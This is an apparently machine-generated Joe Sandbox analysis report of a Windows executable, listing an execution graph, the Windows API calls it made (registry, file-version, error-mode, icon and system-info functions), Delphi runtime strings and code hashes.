                                                                        execution_graph 73987 b1a110 73988 b1a230 73987->73988 73989 b1a13e 73987->73989 73989->73988 73991 b1a304 73989->73991 73992 b1a32c 73991->73992 73995 b1a26c 73992->73995 73994 b1a337 73994->73988 73998 b199a4 73995->73998 73997 b1a28f 73997->73994 73999 b199aa 73998->73999 74002 b15af0 73999->74002 74001 b199bf 74001->73997 74003 b15afa 74002->74003 74006 b0cae4 74003->74006 74005 b15b10 74005->74001 74007 b0caf5 74006->74007 74009 b0cb79 74007->74009 74010 bad3ec 74007->74010 74009->74005 74013 bad1a8 74010->74013 74012 bad3f9 74012->74009 74014 bad1d8 74013->74014 74015 bad323 74013->74015 74014->74015 74016 bad260 RegOpenKeyExW 74014->74016 74015->74012 74016->74014 74017 bad273 74016->74017 74017->74012 74185 b5cee0 74186 b5cee9 74185->74186 74187 b5cef5 74185->74187 74189 b58164 74186->74189 74190 b5816e 74189->74190 74191 b581e4 74190->74191 74193 91af3c 74190->74193 74191->74187 74194 91af69 GetFileVersionInfoSizeW 74193->74194 74196 91af89 GetFileVersionInfoW 74194->74196 74197 91affc 74194->74197 74199 91afbc 74196->74199 74197->74191 74199->74191 74200 bf9748 74202 bf99fe 74200->74202 74203 bf9a22 74202->74203 74207 bf9a24 std::bad_alloc::bad_alloc 74202->74207 74210 bfc0b6 74202->74210 74226 bfc18f TlsGetValue TlsGetValue __amsg_exit 74202->74226 74205 bf9a4a 74228 bf99e1 11 API calls std::exception::exception 74205->74228 74207->74205 74227 bfc050 13 API calls __cinit 74207->74227 74209 bf9a54 CallUnexpected 74211 bfc169 74210->74211 74220 bfc0c8 _malloc 74210->74220 74235 bfc18f TlsGetValue TlsGetValue __amsg_exit 74211->74235 74213 bfc16f 74236 bfbd7e 11 API calls __XcptFilter 74213->74236 74216 bfc161 74216->74202 74219 bfc125 RtlAllocateHeap 74219->74220 74220->74216 74220->74219 74221 bfc155 74220->74221 74224 bfc15a 74220->74224 74229 c0029d 11 API calls 2 library calls 74220->74229 74230 c000f2 11 API calls 6 library calls 74220->74230 74231 bfc067 11 API calls 3 library calls 74220->74231 74232 bfc18f TlsGetValue TlsGetValue __amsg_exit 74220->74232 74233 bfbd7e 11 API calls __XcptFilter 74221->74233 74234 bfbd7e 11 API calls __XcptFilter 74224->74234 74226->74202 74227->74205 74228->74209 74229->74220 74230->74220 74231->74220 74232->74220 74233->74224 74234->74216 74235->74213 74236->74216 74018 bca114 74019 bca127 74018->74019 74021 bca1b2 74018->74021 74020 bca1a8 GetNativeSystemInfo 74019->74020 74019->74021 74020->74021 74022 b0f118 74025 ba6710 74022->74025 74023 b0f147 74026 ba672a 74025->74026 74030 ba672f 74025->74030 74028 ba6801 74026->74028 74026->74030 74029 b0f53c 3 API calls 74028->74029 74031 ba6827 74029->74031 74030->74031 74032 b0f53c 74030->74032 74031->74023 74039 b0f556 74032->74039 74033 b0f5b0 74034 b0f5d9 74033->74034 74038 b0f5b5 74033->74038 74035 b0f72e 74034->74035 74046 b0f5bb 74034->74046 74037 b0acc0 3 API calls 74035->74037 74036 b0f5f5 74041 b0fa7b 74036->74041 74036->74046 74051 b5d288 GetFileVersionInfoSizeW GetFileVersionInfoW 74036->74051 74045 b0f739 74037->74045 74043 b0f9ec 74038->74043 74038->74046 74039->74033 74039->74036 74039->74045 74041->74031 74044 b0acc0 3 API calls 74043->74044 74043->74045 74044->74045 74045->74031 74046->74045 74047 b0acc0 74046->74047 74048 b0acd6 74047->74048 74049 b0aedb 74048->74049 74052 ba9c2c 74048->74052 74049->74045 74051->74046 74053 ba9c3b 74052->74053 74056 ba7b98 74053->74056 74055 ba9c4c 74055->74049 74058 ba7bbc 74056->74058 74057 ba7d31 74059 ba7d45 KiUserCallbackDispatcher 74057->74059 74062 ba7cca 74057->74062 74058->74057 74060 ba7c7d 74058->74060 74059->74062 74060->74062 74063 b5d2a4 GetFileVersionInfoSizeW GetFileVersionInfoW 74060->74063 74062->74055 74063->74062 74237 bfaa66 74238 bfaa71 __DllMainCRTStartup@12 74237->74238 74241 bfa970 74238->74241 74240 bfaa84 74242 bfa97c __freefls@4 74241->74242 74245 bfa9c9 74242->74245 74247 bfaa19 __freefls@4 74242->74247 74249 bfa83b 74242->74249 74244 bfa9f9 74246 bfa83b ___DllMainCRTStartup 28 API calls 74244->74246 74244->74247 74245->74244 74245->74247 74248 bfa83b ___DllMainCRTStartup 28 API calls 74245->74248 74246->74247 74247->74240 74248->74244 74250 bfa8c6 74249->74250 74257 bfa84a ___DllMainCRTStartup 74249->74257 74251 bfa8fd 74250->74251 74252 bfa8cc 74250->74252 74253 bfa95b 74251->74253 74254 bfa902 74251->74254 74255 bfa855 74252->74255 74258 bfa8e7 74252->74258 74301 bfd9ff 11 API calls _doexit 74252->74301 74253->74255 74310 bfb92f 14 API calls 2 library calls 74253->74310 74305 bfb615 TlsGetValue TlsGetValue TlsGetValue TlsSetValue __amsg_exit 74254->74305 74255->74245 74257->74255 74292 bfb99d 13 API calls 6 library calls 74257->74292 74258->74255 74302 bfdcb0 11 API calls __freefls@4 74258->74302 74259 bfa907 74306 bfd6af 11 API calls __calloc_impl 74259->74306 74265 bfa8f1 74303 bfb649 12 API calls 2 library calls 74265->74303 74266 bfa913 74266->74255 74307 bfb59a TlsGetValue TlsGetValue __onexit_nolock 74266->74307 74267 bfa865 74293 bfe1e4 HeapFree HeapFree 74267->74293 74270 bfa861 __RTC_Initialize 74270->74267 74294 bfe031 11 API calls 2 library calls 74270->74294 74271 bfa8f6 74304 bfe1e4 HeapFree HeapFree 74271->74304 74273 bfa931 74276 bfa94f 74273->74276 74277 bfa938 74273->74277 74309 bfaa89 11 API calls 2 library calls 74276->74309 74308 bfb686 11 API calls 2 library calls 74277->74308 74278 bfa881 74295 bfda5c 11 API calls 3 library calls 74278->74295 74282 bfa88b 74283 bfa88f 74282->74283 74297 bfdf76 19 API calls ___initmbctable 74282->74297 74296 bfb649 12 API calls 2 library calls 74283->74296 74286 bfa89b 74291 bfa8af 74286->74291 74298 bfdcfe 19 API calls 6 library calls 74286->74298 74289 bfa8a4 74289->74291 74299 bfd838 13 API calls 5 library calls 74289->74299 74291->74255 74300 bfdcb0 11 API calls __freefls@4 74291->74300 74292->74270 74293->74255 74294->74278 74295->74282 74296->74267 74297->74286 74298->74289 74299->74291 74300->74283 74301->74258 74302->74265 74303->74271 74304->74255 74305->74259 74306->74266 74307->74273 74309->74255 74310->74255 74064 8fdc44 74065 8fdc4c 74064->74065 74065->74065 74067 8fdc88 74065->74067 74068 8fc184 74065->74068 74069 8fc193 74068->74069 74071 8fc1a9 74068->74071 74069->74071 74072 8fc13c 74069->74072 74071->74067 74073 8fc14c 74072->74073 74074 8fc168 74072->74074 74076 8fd3b4 74073->74076 74074->74071 74077 8fd3f5 74076->74077 74080 8fd290 74077->74080 74079 8fd42e 74079->74074 74082 8fd2b1 74080->74082 74081 8fd32c 74081->74079 74082->74081 74086 8fc97c 74082->74086 74084 8fd348 74084->74081 74085 8fc97c 6 API calls 74084->74085 74085->74081 74087 8fc99f 74086->74087 74089 8fc9a8 74087->74089 74090 8fc860 6 API calls 74087->74090 74089->74084 74090->74089 74091 8fee44 74092 8fee4f 74091->74092 74095 8f9498 74092->74095 74096 8f94a7 74095->74096 74099 8f97dc 74096->74099 74100 8f942c 74096->74100 74101 8f9474 74100->74101 74102 8f943c 74100->74102 74102->74101 74104 bcb794 74102->74104 74105 bcb7c1 74104->74105 74106 bcb7ae 74104->74106 74105->74102 74108 b192fc 74106->74108 74109 b19322 GlobalAddAtomW 74108->74109 74111 b19370 74109->74111 74118 b19070 74111->74118 74113 b193d1 74123 bacb1c 74113->74123 74115 b193f0 74129 bae394 74115->74129 74117 b19410 74117->74105 74119 b190d0 74118->74119 74120 b1907f SetErrorMode 74118->74120 74119->74113 74121 b190b2 SetErrorMode 74120->74121 74122 b190a3 74120->74122 74121->74113 74122->74121 74124 bacb26 74123->74124 74133 bacffc 74124->74133 74126 bacb5f 74137 bad5d8 74126->74137 74128 bacc47 74128->74115 74130 bae3a3 74129->74130 74131 bae4a7 LoadIconW 74130->74131 74132 bae4ca 74131->74132 74132->74117 74134 bad00e 74133->74134 74135 bad032 LoadCursorW 74134->74135 74136 bad04f 74134->74136 74135->74134 74136->74126 74138 bad5f2 74137->74138 74139 bad66c SystemParametersInfoW 74138->74139 74140 bad68a 74139->74140 74140->74128 74141 beb7b0 74142 beb7db 74141->74142 74143 beb805 74141->74143 74142->74143 74144 beb7e2 WriteProcessMemory 74142->74144 74145 bb0354 74146 bb036e 74145->74146 74149 ba544c 74146->74149 74147 bb03cd 74150 ba5460 74149->74150 74156 ba4a24 74150->74156 74152 ba5486 74153 ba558f 74152->74153 74160 99e834 74152->74160 74153->74147 74154 ba5517 74154->74147 74157 ba4a2d 74156->74157 74158 b0cae4 RegOpenKeyExW 74157->74158 74159 ba4a43 74158->74159 74159->74152 74161 99e84a 74160->74161 74164 99e7a8 74161->74164 74163 99e89a 74163->74154 74165 99e7c9 74164->74165 74166 99e80c 74164->74166 74165->74166 74167 99e7a8 KiUserCallbackDispatcher 74165->74167 74166->74163 74168 99e7e1 74167->74168 74170 99d0a0 74168->74170 74171 99d0b1 74170->74171 74172 99d11d 74171->74172 74175 9a54a4 74171->74175 74172->74166 74176 9a54c0 74175->74176 74179 9aad64 74176->74179 74178 99d0fc 74178->74166 74180 9aad9d 74179->74180 74183 b094b0 74180->74183 74181 9aaf5c 74181->74178 74184 b094ca KiUserCallbackDispatcher 74183->74184 74184->74181

                                                                        Executed Functions

                                                                        Function 00B192FC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GlobalAddAtomW.KERNEL32(00000000), ref: 00B19350
                                                                          • Part of subcall function 00B19070: SetErrorMode.KERNELBASE(00008000), ref: 00B19084
                                                                          • Part of subcall function 00B19070: SetErrorMode.KERNELBASE(?,00B190D0), ref: 00B190C3
                                                                          • Part of subcall function 00BAE394: LoadIconW.USER32(00BD4040,MAINICON,?,?,?,00B19410), ref: 00BAE4BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AtomGlobalIconLoad
                                                                        • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DelphiRM_GetObjectInstance$USER32
                                                                        • API String ID: 1953398334-1139167764
                                                                        • Opcode ID: 1c95ce4c36e97c6fcfdb48dcd49fe51db96fc80a9add1da6eed97a1b8032b9d3
                                                                        • Instruction ID: eb676cbad24aaa0b91f0ea24cc2153ef68e0799743882eefd44177d352ddbfe0
                                                                        • Opcode Fuzzy Hash: 1c95ce4c36e97c6fcfdb48dcd49fe51db96fc80a9add1da6eed97a1b8032b9d3
                                                                        • Instruction Fuzzy Hash: 0B4171746102459FCB00EFB8ECA2A9DB7E8FB55300B404475F514D73A2EF349A44CB61
                                                                        Function 00BFA83B Relevance: 9.1, APIs: 6, Instructions: 105COMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • __RTC_Initialize.LIBCMT ref: 00BFA86C
                                                                        • __mtterm.LIBCMT ref: 00BFA88F
                                                                          • Part of subcall function 00BFB649: TlsFree.KERNEL32(00C0C65C,00BFA8F6), ref: 00BFB674
                                                                        • __setenvp.LIBCMT ref: 00BFA89F
                                                                        • __cinit.LIBCMT ref: 00BFA8AA
                                                                        • __mtterm.LIBCMT ref: 00BFA8F1
                                                                        • __freeptd.LIBCMT ref: 00BFA961
                                                                          • Part of subcall function 00BFB615: TlsGetValue.KERNEL32(?,00BFB784), ref: 00BFB61E
                                                                          • Part of subcall function 00BFB615: TlsSetValue.KERNEL32(00000000), ref: 00BFB63F
                                                                          • Part of subcall function 00BFD6AF: __calloc_impl.LIBCMT ref: 00BFD6C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Value__mtterm$FreeInitialize__calloc_impl__cinit__freeptd__setenvp
                                                                        • String ID:
                                                                        • API String ID: 2350678278-0
                                                                        • Opcode ID: d16c792c564670ba1b86d74d927a25730e30b85192023b1dd84fb5ee3bf32d4f
                                                                        • Instruction ID: f64f2a478e634570c8f0f6d208d266b769087dd454550bf204c2f94335498ce5
                                                                        • Opcode Fuzzy Hash: d16c792c564670ba1b86d74d927a25730e30b85192023b1dd84fb5ee3bf32d4f
                                                                        • Instruction Fuzzy Hash: 862195B150424D999A2D37B19C4273E33E9DE507A0B2141FAFB19D3192EBA0C84E9563
                                                                        Function 00BF9748 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 106 bf9748-bf9a06 108 bf9a15-bf9a18 call bfc0b6 106->108 110 bf9a1d-bf9a20 108->110 111 bf9a08-bf9a13 call bfc18f 110->111 112 bf9a22-bf9a23 110->112 111->108 115 bf9a24-bf9a30 111->115 116 bf9a4b-bf9a6f call bf99e1 call bfc1b7 115->116 117 bf9a32-bf9a4a call bf9994 call bfc050 115->117 126 bf9a78-bf9a7e 116->126 117->116 127 bf9a71-bf9a74 126->127 128 bf9a80-bf9a83 126->128 129 bf9a87-bf9a88 127->129 131 bf9a76-bf9a77 127->131 128->129 130 bf9a85 128->130 130->129 131->126
                                                                        APIs
                                                                        • _malloc.LIBCMT ref: 00BF9A18
                                                                          • Part of subcall function 00BFC0B6: __FF_MSGBANNER.LIBCMT ref: 00BFC0D9
                                                                          • Part of subcall function 00BFC0B6: __NMSG_WRITE.LIBCMT ref: 00BFC0E0
                                                                          • Part of subcall function 00BFC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00BFC12D
                                                                        • std::bad_alloc::bad_alloc.LIBCMT ref: 00BF9A3B
                                                                          • Part of subcall function 00BF9994: std::exception::exception.LIBCMT ref: 00BF99A0
                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00BF9A4F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4443944478.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bf9000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                        • String ID: PU'
                                                                        • API String ID: 832318072-4254717615
                                                                        • Opcode ID: b613c0d7c0ea77554799149e1680cf0c84d9b3254bd149dcfea0352e342adf7e
                                                                        • Instruction ID: 3648112d81437b8c644b9c83ee2dc51648abf5ca7bd2a91fbe63d0fa4b4afe67
                                                                        • Opcode Fuzzy Hash: b613c0d7c0ea77554799149e1680cf0c84d9b3254bd149dcfea0352e342adf7e
                                                                        • Instruction Fuzzy Hash: 22014C3140420D6ACF34B765D802BBE3BD8CB80728B1480F5FA05975E2DE71DD8EC691
                                                                        Function 00BAD1A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125registryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 132 bad1a8-bad1d2 133 bad1d8-bad206 132->133 134 bad334-bad352 132->134 139 bad20c-bad216 133->139 140 bad323-bad32d 133->140 141 bad219-bad225 call b19244 139->141 140->134 144 bad22b-bad26d RegOpenKeyExW 141->144 145 bad316-bad31d 141->145 144->145 147 bad273-bad2a7 144->147 145->140 145->141 149 bad2f8-bad30e 147->149 150 bad2a9-bad2e0 147->150 150->149 154 bad2e2-bad2ee 150->154 154->149
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNELBASE(80000002,00000000), ref: 00BAD266
                                                                        Strings
                                                                        • layout text, xrefs: 00BAD297
                                                                        • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00BAD250
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                        • API String ID: 71445658-2652665750
                                                                        • Opcode ID: 1e904e6baa49bde0ca5e0c38124d7ac03643cc4edf114ff24013146a2408addd
                                                                        • Instruction ID: 49f2b7b088fac2598c3a4c1a948244a5982aef24147e978703b2f46d72a5fa7d
                                                                        • Opcode Fuzzy Hash: 1e904e6baa49bde0ca5e0c38124d7ac03643cc4edf114ff24013146a2408addd
                                                                        • Instruction Fuzzy Hash: 73412874A04208AFDB11DF98C982BADB7F9FB4A300F5040E5EA05E7651E770AF44CB66
                                                                        Function 00B19070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 155 b19070-b1907d 156 b190d0-b190d2 155->156 157 b1907f-b190a1 SetErrorMode 155->157 158 b190a3-b190ad 157->158 159 b190b2-b190c8 SetErrorMode 157->159 158->159
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008000), ref: 00B19084
                                                                        • SetErrorMode.KERNELBASE(?,00B190D0), ref: 00B190C3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID: imm32.dll
                                                                        • API String ID: 2340568224-1815517138
                                                                        • Opcode ID: f8df4e2d89f544a77f160caf0bb080919012a3fb0f62eea1a2ae0f2a74ade47c
                                                                        • Instruction ID: 816a1f0bcc38b5fe124907dc713d354a62ea22c1b5ef718e55cc8bac2181f8fc
                                                                        • Opcode Fuzzy Hash: f8df4e2d89f544a77f160caf0bb080919012a3fb0f62eea1a2ae0f2a74ade47c
                                                                        • Instruction Fuzzy Hash: F3F0E271608744AFD711DB68AC36B65B7ECD348B10FD2C4E6F008D39E0EA759980CA20
                                                                        Function 00BAE394 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150windowCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 236 bae394-bae3a1 237 bae3ab-bae3c1 236->237 238 bae3a3 236->238 240 bae3d8-bae3e2 237->240 241 bae3c3-bae3d2 237->241 238->237 242 bae3f2-bae3fc 240->242 243 bae3e4-bae3ec 240->243 241->240 245 bae3fe-bae406 242->245 246 bae40c-bae516 call aea890 call af3ea0 LoadIconW call af4338 242->246 243->242 245->246 258 bae518-bae51b 246->258 259 bae526-bae537 246->259 258->259 261 bae539 259->261 262 bae53e-bae56c call ba3c28 259->262 261->262 267 bae571-bae586 262->267 268 bae588-bae58a call bae7d8 267->268 269 bae58f-bae5db call bb1304 call bb1f70 267->269 268->269 275 bae5ec-bae5f3 269->275 276 bae5dd-bae5e9 269->276 276->275
                                                                        APIs
                                                                        • LoadIconW.USER32(00BD4040,MAINICON,?,?,?,00B19410), ref: 00BAE4BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: IconLoad
                                                                        • String ID: MAINICON
                                                                        • API String ID: 2457776203-2283262055
                                                                        • Opcode ID: 6b7a2074d793824c5334a84bf81de091391bf24dc4a4f86d8c4c0ec8d5010782
                                                                        • Instruction ID: 2524b4a6ddd932bf2146fc068aed1bf61bda67de64a1989dbd01c35ad8abf018
                                                                        • Opcode Fuzzy Hash: 6b7a2074d793824c5334a84bf81de091391bf24dc4a4f86d8c4c0ec8d5010782
                                                                        • Instruction Fuzzy Hash: E4612B70A042848FDB01EF38D885B957BE5AB15304F4884F9E808CF357DBB59948CB61
                                                                        Function 0091AF3C Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 278 91af3c-91af87 GetFileVersionInfoSizeW 282 91af89-91afba GetFileVersionInfoW 278->282 283 91affc-91b011 278->283 287 91afbc-91afd4 282->287 288 91afdf-91aff4 282->288 287->288 291 91afd6-91afdc 287->291 291->288
                                                                        APIs
                                                                        • GetFileVersionInfoSizeW.KERNELBASE(00000000), ref: 0091AF7E
                                                                        • GetFileVersionInfoW.KERNELBASE(00000000), ref: 0091AFB3
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.000000000090B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0090B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_90b000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: FileInfoVersion$Size
                                                                        • String ID:
                                                                        • API String ID: 2104008232-0
                                                                        • Opcode ID: 9025fdb617e3be68b2b7e1b7475ed71cc066d4922fcdfae73c8a665c1ecf6868
                                                                        • Instruction ID: fb878bab0baaefd6573d80c1c4d3e864ee8750e931245e6ab9a4d02e05b557ce
                                                                        • Opcode Fuzzy Hash: 9025fdb617e3be68b2b7e1b7475ed71cc066d4922fcdfae73c8a665c1ecf6868
                                                                        • Instruction Fuzzy Hash: 1D213DB1B0060DAFDB15DFB8CC829AEB7FCEB89310B514471B610E3691EB34DE419622
                                                                        Function 00BA7B98 Relevance: 1.7, APIs: 1, Instructions: 182COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 292 ba7b98-ba7bba 293 ba7c2c-ba7c34 292->293 294 ba7bbc-ba7bc9 call bacee4 292->294 295 ba7c3d-ba7c41 293->295 296 ba7c36-ba7c38 call b996d4 293->296 294->293 302 ba7bcb-ba7bcf 294->302 300 ba7c4d 295->300 301 ba7c43-ba7c45 295->301 296->295 303 ba7c4f-ba7c57 300->303 301->303 304 ba7c47-ba7c4b 301->304 305 ba7bd1-ba7be3 call baced0 302->305 306 ba7c59-ba7c5b 303->306 307 ba7c62-ba7c64 303->307 304->300 304->303 318 ba7c26-ba7c2a 305->318 319 ba7be5-ba7bf3 call baced0 305->319 306->307 309 ba7c6a-ba7c6e 307->309 310 ba7d31-ba7d3a call b12cf8 307->310 311 ba7c7d-ba7c87 309->311 312 ba7c70-ba7c77 309->312 323 ba7d4b-ba7d52 310->323 324 ba7d3c-ba7d46 call b12928 KiUserCallbackDispatcher 310->324 315 ba7c89-ba7c90 311->315 316 ba7c92-ba7c96 311->316 312->310 312->311 315->316 320 ba7c98-ba7ca1 call b12cf8 315->320 316->320 321 ba7d0c-ba7d13 316->321 318->293 318->305 319->318 334 ba7bf5-ba7c21 319->334 320->323 339 ba7ca7-ba7cc3 call b12928 320->339 321->323 328 ba7d15-ba7d1e call b12cf8 321->328 329 ba7d5d-ba7d6b call ba7ad0 323->329 330 ba7d54-ba7d58 call ba95c0 323->330 324->323 328->323 342 ba7d20-ba7d2f call b12928 328->342 340 ba7d6d-ba7d71 329->340 341 ba7db2-ba7dc7 329->341 330->329 334->318 358 ba7cfa-ba7d0a call b12928 call b996d4 339->358 359 ba7cc5-ba7ccc call b5d2a4 339->359 340->341 345 ba7d73-ba7d77 340->345 342->323 345->341 348 ba7d79-ba7dad call b12928 call b0ab94 * 2 345->348 348->341 358->323 366 ba7cce-ba7cd6 359->366 367 ba7ce1-ba7cf4 call b12928 359->367 366->367 370 ba7cd8-ba7cdf 366->370 367->358 370->358 370->367
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(00000000,00000000,00000000,00BA7DC8), ref: 00BA7D46
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: af63416ba845460bd630a52403bb75e0c9295cbacd8cedc1deada90a47cef615
                                                                        • Instruction ID: c972dfceb7f9d5885886ac9c16fc0218747b7e7f8416ade7e42283158c5cdf4b
                                                                        • Opcode Fuzzy Hash: af63416ba845460bd630a52403bb75e0c9295cbacd8cedc1deada90a47cef615
                                                                        • Instruction Fuzzy Hash: 49518C7064C2445BDB21AB38CC85BAA77D4EF46710F0845F9EC859B297DE74CC8987A0
                                                                        Function 00BCA114 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 375 bca114-bca121 376 bca3be-bca3c4 375->376 377 bca127-bca1a6 375->377 382 bca1a8-bca1ad GetNativeSystemInfo 377->382 383 bca1b2-bca1d1 377->383 382->383 384 bca1e5-bca232 383->384 385 bca1d3-bca1da 383->385 387 bca237-bca24e 384->387 386 bca1dc-bca1e3 385->386 385->387 386->384 386->387 390 bca33d-bca345 387->390 391 bca254-bca255 387->391 393 bca34e-bca35d 390->393 394 bca347 390->394 391->376 392 bca25b-bca263 391->392 395 bca265 392->395 396 bca276-bca27e 392->396 393->376 397 bca35f-bca36e 394->397 398 bca349-bca34a 394->398 399 bca2a8-bca2b0 395->399 400 bca267-bca268 395->400 401 bca294-bca2a3 396->401 402 bca280-bca28f 396->402 397->376 403 bca34c 398->403 404 bca370-bca378 398->404 411 bca2c6-bca2d5 399->411 412 bca2b2-bca2c1 399->412 408 bca2da-bca2e2 400->408 409 bca26a-bca26b 400->409 401->376 402->376 403->376 406 bca37a-bca380 404->406 407 bca393-bca39c 404->407 406->407 413 bca382-bca391 406->413 424 bca39e-bca3ad 407->424 425 bca3af-bca3b4 407->425 414 bca2f8-bca307 408->414 415 bca2e4-bca2f3 408->415 416 bca30c-bca313 409->416 417 bca271 409->417 411->376 412->376 413->376 414->376 415->376 429 bca329-bca338 416->429 430 bca315-bca324 416->430 417->376 424->376 425->376 429->376 430->376
                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00BCA1AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000BCA000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BCA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_bca000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: InfoNativeSystem
                                                                        • String ID:
                                                                        • API String ID: 1721193555-0
                                                                        • Opcode ID: 2192b3081a6e02d49413d024947aa247b159940df19549d8d952031f23e1a32b
                                                                        • Instruction ID: 462f3ab7d48d92185eb81351417e236bbc40db4feb3c10684c611fe990435b9d
                                                                        • Opcode Fuzzy Hash: 2192b3081a6e02d49413d024947aa247b159940df19549d8d952031f23e1a32b
                                                                        • Instruction Fuzzy Hash: CC613D346092888BC714DB2CE961A6AB7F2FBC5308F24446FE145CB3A6FA759945CB07
                                                                        Function 00BAD5D8 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 434 bad5d8-bad5f0 435 bad5f2-bad5fe 434->435 436 bad601-bad616 434->436 435->436 437 bad618-bad61f call bb0d6c 436->437 438 bad624-bad639 436->438 437->438 441 bad63b-bad651 call aeacf0 438->441 442 bad653-bad662 call aeacf0 438->442 448 bad667-bad688 SystemParametersInfoW 441->448 442->448 450 bad68a-bad6ee call aeacf0 * 4 448->450 451 bad6f0-bad737 call aeae28 call aeacf0 * 3 448->451 472 bad73c-bad780 call aeaa7c * 3 450->472 451->472 481 bad782-bad78b call bb0d6c 472->481 482 bad790 472->482 481->482
                                                                        APIs
                                                                        • SystemParametersInfoW.USER32(00000029,00000000,?,00000000,?,00000000,00B9F730,?,00BACC47,00000000,00000000,00BA783C,6E6F4646,?,?,00000000), ref: 00BAD681
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.4174824901.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_acd000_windows10.jbxd
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem
                                                                        • String ID:
                                                                        • API String ID: 3098949447-0
                                                                        • Opcode ID: 8bfea186d0018943c42780c94403ae4a5a1316809e3b7ea8738cc75c244297ce
